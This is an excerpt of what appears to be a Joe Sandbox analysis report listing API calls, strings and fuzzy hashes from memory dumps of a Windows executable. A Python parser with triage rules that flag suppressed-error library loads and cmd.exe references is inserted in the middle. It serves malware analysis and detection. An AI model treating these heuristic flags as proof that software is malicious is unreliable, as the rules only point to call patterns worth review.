                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                        • String ID: uu
                                                                                                                                        • API String ID: 1263568516-2249551878
                                                                                                                                        • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                                                        • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                                                                        • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                                                        • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                                                                        APIs
                                                                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1375471231-0
                                                                                                                                        • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                                                                        • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                                                                                        • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                                                                        • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                                                                                        APIs
                                                                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                                                                                        • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CursorLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3238433803-0
                                                                                                                                        • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                                                                        • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                                                                                                        • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                                                                        • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNEL32(00000000,00000644,?,0049B450,004013A3,?,?,00401443,?,?,?,?,?,00401983), ref: 00401353
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocLocal
                                                                                                                                        • String ID: tuuu
                                                                                                                                        • API String ID: 3494564517-3300879914
                                                                                                                                        • Opcode ID: 833cffc3d4ae6fddf196a7017a3fa962a39b4640526386715143ff6d9bbaf8a6
                                                                                                                                        • Instruction ID: 71c91fbc4c3ed8fd369fb1531a6952d3d9178ec9d6227f0a2e7a8dd8dab45303
                                                                                                                                        • Opcode Fuzzy Hash: 833cffc3d4ae6fddf196a7017a3fa962a39b4640526386715143ff6d9bbaf8a6
                                                                                                                                        • Instruction Fuzzy Hash: 0CF05E717013018FE724CF29D980656B7E1EBA9365F24807EE5C5D7761D3358C419B94
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                                        • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLibraryLoadMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2987862817-0
                                                                                                                                        • Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                                                                        • Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
                                                                                                                                        • Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                                                                        • Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
                                                                                                                                        APIs
                                                                                                                                        • SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
                                                                                                                                        • CoTaskMemFree.OLE32(?,0047C8DE), ref: 0047C8D1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FolderFreeKnownPathTask
                                                                                                                                        • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                                                                        • API String ID: 969438705-544719455
                                                                                                                                        • Opcode ID: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                                                                        • Instruction ID: f48ec61de784b6bea0373c7a91bc006da4a0813e938d35ae17fa89473a65de5f
                                                                                                                                        • Opcode Fuzzy Hash: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                                                                        • Instruction Fuzzy Hash: 22E09230340604BFEB15EB61DC92F6977A8EB48B01B72847BF504E2680D67CAD00DB1C
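The records above are the report's own per-function listing. What follows is an added example, written for this page and not code from Joe Sandbox or from the analysed sample: it parses records in this layout (APIs, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity) into structured objects and runs a small constructed triage rule set over three of them. The record layout, the "$" separator in the String ID field and the "Download File" link residue on the Associated lines are inferred from the lines on this page; the names ApiCall, FunctionRecord, parse_records, triage and the two watchlists are this example's own, and the sample input is copied from the records above with the indentation collapsed. SEM_NOOPENFILEERRORBOX = 0x8000 is the documented Win32 value of the SetErrorMode argument seen in the record at 0042E39E.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# One API line: "[Part of subcall function XXXXXXXX: ]Name.MODULE(args), ref: XXXXXXXX"
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?(?P<name>\w+)"
                    r"\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # set for "Part of subcall function ..." lines

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    dumps: list = field(default_factory=list)   # .sdmp names (Source File + Associated)
    fields: dict = field(default_factory=dict)  # API ID, String ID, fuzzy hashes, ...

    @property
    def api_names(self):
        return {a.name for a in self.apis}

    @property
    def strings(self):
        sid = self.fields.get("String ID", "")   # the report joins strings with "$"
        return sid.split("$") if sid else []

def _clean(line):
    """Drop indentation, the bullet marker and the 'Download File' link residue."""
    return line.strip().lstrip("•").strip().removesuffix("Download File").strip()

def parse_records(text):
    records, section = [], None
    for raw in text.splitlines():
        line = _clean(raw)
        if not line:
            continue
        if line in SECTIONS:
            section = line
            if line == "APIs":                   # every record opens with its APIs block
                records.append(FunctionRecord())
            continue
        if not records or section == "Strings":  # Strings blocks on this page are empty
            continue
        rec, (key, _, val) = records[-1], line.partition(":")
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                rec.apis.append(ApiCall(m["name"], m["module"],
                                        [a for a in m["args"].split(",") if a],
                                        int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None))
        elif section == "Memory Dump Source":
            rec.dumps.append(val.split(",")[0].strip())   # keep only the .sdmp name
        else:
            rec.fields[key.strip()] = val.strip()
    return records

# Constructed triage rules: API combinations and strings worth a second look.
WATCH_APIS = {frozenset({"SetErrorMode", "LoadLibraryA"}):
              "library load with error dialogs suppressed (0x8000 = SEM_NOOPENFILEERRORBOX)"}
WATCH_STRINGS = {"cmd.exe", "COMMAND.COM"}

def triage(records):
    """Return (record index, reason) for every rule that matches a record."""
    hits = []
    for i, rec in enumerate(records):
        hits += [(i, why) for combo, why in WATCH_APIS.items() if combo <= rec.api_names]
        found = sorted(WATCH_STRINGS & set(rec.strings))
        if found:
            hits.append((i, "references command interpreter: " + ", ".join(found)))
    return hits

# Sample input: three records copied from the report text above, indentation collapsed.
REPORT_SAMPLE = r"""
APIs
• SetErrorMode.KERNEL32(00008000), ref: 0042E39E
• LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Similarity
• API ID: ErrorLibraryLoadMode
• Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
APIs
• SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
• CoTaskMemFree.OLE32(?,0047C8DE), ref: 0047C8D1
Strings
Similarity
• API ID: FolderFreeKnownPathTask
• String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
• GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
• Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
"""
```

Calling parse_records(REPORT_SAMPLE) yields three FunctionRecord objects; triage() then flags record 0 for the SetErrorMode(0x8000) + LoadLibraryA pair and record 1 for the COMMAND.COM and cmd.exe strings, while record 2 (SetFilePointer with its GetLastError subcall) matches nothing. Feed it the full report text instead of the sample and the same functions give you every call site per API name and every record whose strings or API set hits a rule, which is the pivot an analyst usually wants from this section.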
APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
• GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
  • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
• Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
• Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
• Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
  • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
  • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID:
• API String ID: 1658689577-0
• Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
• Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
• Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
• Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
APIs
• SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: InfoScroll
• String ID:
• API String ID: 629608716-0
• Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
• Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
• Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
• Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
APIs
  • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
  • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
• SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
  • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
  • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
• String ID:
• API String ID: 3319771486-0
• Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
• Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
• Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
• Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
APIs
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
• Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
• Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
• Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
APIs
• CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
• Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
• Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
• Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
APIs
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
• Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
• Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
• Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
• Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
• Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
• Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                                                                        • Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
                                                                                                                                        • Opcode Fuzzy Hash: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                                                                        • Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
                                                                                                                                        APIs
                                                                                                                                        • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
